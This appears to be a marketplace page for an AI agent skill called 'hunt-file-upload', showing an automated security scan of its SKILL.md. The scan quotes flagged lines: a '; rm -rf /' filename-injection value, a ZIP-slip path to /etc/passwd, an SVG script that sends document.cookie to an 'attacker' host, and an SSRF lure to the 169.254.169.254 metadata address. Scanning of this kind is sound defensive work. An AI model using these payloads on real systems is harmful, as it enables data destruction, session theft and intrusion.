hunt-file-upload
Identifies and exploits file upload vulnerabilities, including RCE, XSS, and SSRF, using various bypass techniques for security testing.
Install this skill
or
0/100
Security score
The hunt-file-upload skill was audited on May 29, 2026 and we found 10 security issues across 4 threat categories, including 4 critical. Review the findings below before installing.
Categories Tested
Security Issues
critical line 27
Destructive rm -rf command
SourceSKILL.md
| 27 | | Filename injection | `; rm -rf /` in filename | Sanitize + use UUID names | |
high line 51
System command execution
SourceSKILL.md
| 51 | - **`hunt-rce`** — File upload is the most common path to RCE on classic PHP/JSP/ASPX stacks once you find a directly-served upload directory or a deserializer-fed processor. Chain primitive: polyglot |
medium line 53
Fetch to external URL
SourceSKILL.md
| 53 | - **`hunt-xss`** — SVGs, HTML files, and PDFs uploaded then served on the same origin are stored-XSS factories. Chain primitive: upload SVG with `<script>fetch('//attacker/?'+document.cookie)</script> |
critical line 3
Access to /etc/passwd
SourceSKILL.md
| 3 | description: "Hunt file upload bugs — RCE via webshell, XSS via SVG/HTML, SSRF via XXE in DOCX, path traversal via filename. Bypass tables (10 techniques): double extension (shell.php.jpg if server ch |
critical line 26
Access to /etc/passwd
SourceSKILL.md
| 26 | | ZIP slip | `../../../etc/passwd` in archive | Validate extracted paths | |
critical line 52
Access to /etc/passwd
SourceSKILL.md
| 52 | - **`hunt-xxe`** — Office formats (DOCX/XLSX/PPTX), SVGs, and SOAP attachments are XML inside a ZIP — every upload-and-parse feature is a latent XXE candidate. Chain primitive: upload DOCX whose `[Con |
high line 3
Path traversal to sensitive directory
SourceSKILL.md
| 3 | description: "Hunt file upload bugs — RCE via webshell, XSS via SVG/HTML, SSRF via XXE in DOCX, path traversal via filename. Bypass tables (10 techniques): double extension (shell.php.jpg if server ch |
high line 26
Path traversal to sensitive directory
SourceSKILL.md
| 26 | | ZIP slip | `../../../etc/passwd` in archive | Validate extracted paths | |
low line 42
External URL reference
SourceSKILL.md
| 42 | <svg xmlns="http://www.w3.org/2000/svg"> |
low line 54
External URL reference
SourceSKILL.md
| 54 | - **`hunt-ssrf`** — Image-processing libraries (ImageMagick, ffmpeg) fetch remote URLs from inside the uploaded file. Chain primitive: upload an SVG/MVG with `<image xlink:href="http://169.254.169.254 |
Scanned on May 29, 2026
View Security Dashboard